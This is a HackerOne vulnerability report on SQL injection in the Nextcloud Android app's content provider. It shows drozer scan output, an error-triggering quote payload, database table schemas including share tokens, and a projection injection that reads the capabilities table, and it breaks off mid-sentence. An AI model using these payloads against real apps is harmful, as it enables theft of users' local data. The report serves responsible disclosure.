Nextcloud: SQL Injection found in NextCloud Android App Content Provider

2017-11-2003:55:23

bluedangerforyou

hackerone.com

$150

178

0.001 Low

EPSS

Percentile

49.5%

JSON

Using Drozer, we identified com.nextcloud.client is vulnerable to Sql Injection
here is output from drozer:

dz> run scanner.provider.injection -a com.nextcloud.client
Scanning com.nextcloud.client…
Not Vulnerable:
content://com.nextcloud.android.providers.UsersAndGroupsSearchProvider
content://downloads/public_downloads
content://com.google.android.gsf.gservices/prefix/
content://com.nextcloud.client.firebaseinitprovider/
content://com.google.android.gms.chimera/
content://com.google.android.gms.chimera
content://com.google.android.gsf.gservices
content://org.nextcloud.files/
content://com.nextcloud.client.firebaseinitprovider
content://downloads/public_downloads/
content://com.google.android.gsf.gservices/prefix
content://org.nextcloud.documents/
content://org.nextcloud.files
content://org.nextcloud.documents
content://com.nextcloud.android.providers.UsersAndGroupsSearchProvider/
content://com.google.android.gsf.gservices/

Injection in Projection:
content://org.nextcloud/
content://org.nextcloud

Injection in Selection:
content://org.nextcloud/
content://org.nextcloud

We can see its vulnerable by running:

dz> run app.provider.query content://org.nextcloud/ --projection “'”
unrecognized token: “’ FROM filelist ORDER BY filename collate nocase asc” (code 1): , while compiling: SELECT ’ FROM filelist ORDER BY filename collate nocase asc
#################################################################
Error Code : 1 (SQLITE_ERROR)
Caused By : SQL(query) error or missing database.
(unrecognized token: “’ FROM filelist ORDER BY filename collate nocase asc” (code 1): , while compiling: SELECT ’ FROM filelist ORDER BY filename collate nocase asc)
#################################################################
#################################################################
Error Code : 1 (SQLITE_ERROR)
Caused By : SQL(query) error or missing database.
(unrecognized token: “’ FROM filelist ORDER BY filename collate nocase asc” (code 1): , while compiling: SELECT ’ FROM filelist ORDER BY filename collate nocase asc
#################################################################
Error Code : 1 (SQLITE_ERROR)
Caused By : SQL(query) error or missing database.
(unrecognized token: “’ FROM filelist ORDER BY filename collate nocase asc” (code 1): , while compiling: SELECT ’ FROM filelist ORDER BY filename collate nocase asc)
#################################################################)
#################################################################
dz>

we see 12 tables by running this command in drozer:

| table | filelist | filelist | 4 | CREATE TABLE filelist(_id INTEGER PRIMARY KEY, filename TEXT, path TEXT, parent INTEGER, created INTEGER, modified INTEGER, content_type TEXT, content_length INTEGER, media_path TEXT, file_owner TEXT, last_sync_date INTEGER, keep_in_sync INTEGER, last_sync_date_for_data INTEGER, modified_at_last_sync_for_data INTEGER, etag TEXT, share_by_link INTEGER, public_link TEXT, permissions TEXT null,remote_id TEXT null,update_thumbnail INTEGER, is_downloading INTEGER, favorite INTEGER, etag_in_conflict TEXT, shared_via_users INTEGER)

| table | ocshares | ocshares | 5 | CREATE TABLE ocshares(_id INTEGER PRIMARY KEY, file_source INTEGER, item_source INTEGER, share_type INTEGER, shate_with TEXT, path TEXT, permissions INTEGER, shared_date INTEGER, expiration_date INTEGER, token TEXT, shared_with_display_name TEXT, is_directory INTEGER, user_id INTEGER, id_remote_shared INTEGER, owner_share TEXT )

| table | capabilities | capabilities | 6 | CREATE TABLE capabilities(_id INTEGER PRIMARY KEY, account TEXT, version_mayor INTEGER, version_minor INTEGER, version_micro INTEGER, version_string TEXT, version_edition TEXT, core_pollinterval INTEGER, sharing_api_enabled INTEGER, sharing_public_enabled INTEGER, sharing_public_password_enforced INTEGER, sharing_public_expire_date_enabled INTEGER, sharing_public_expire_date_days INTEGER, sharing_public_expire_date_enforced INTEGER, sharing_public_send_mail INTEGER, sharing_public_upload INTEGER, sharing_user_send_mail INTEGER, sharing_resharing INTEGER, sharing_federation_outgoing INTEGER, sharing_federation_incoming INTEGER, files_bigfilechunking INTEGER, files_undelete INTEGER, files_versioning INTEGER, files_drop INTEGER, external_links INTEGER, server_name TEXT, server_color TEXT, server_slogan TEXT, background_url TEXT ) |
| table | list_of_uploads | list_of_uploads | 7 | CREATE TABLE list_of_uploads(_id INTEGER PRIMARY KEY, local_path TEXT, remote_path TEXT, account_name TEXT, file_size LONG, status INTEGER, local_behaviour INTEGER, upload_time INTEGER, force_overwrite INTEGER, is_create_remote_folder INTEGER, upload_end_timestamp INTEGER, last_result INTEGER, is_while_charging_only INTEGER, is_wifi_only INTEGER, created_by INTEGER )

| table | synced_folders | synced_folders | 8 | CREATE TABLE synced_folders(_id INTEGER PRIMARY KEY, local_path TEXT, remote_path TEXT, wifi_only INTEGER, charging_only INTEGER, enabled INTEGER, subfolder_by_date INTEGER, account TEXT, upload_option INTEGER, type INTEGER )

Lets look into the capabilities table:

dz> run app.provider.query content://org.nextcloud/ --projection “* FROM capabilities;–”

we see account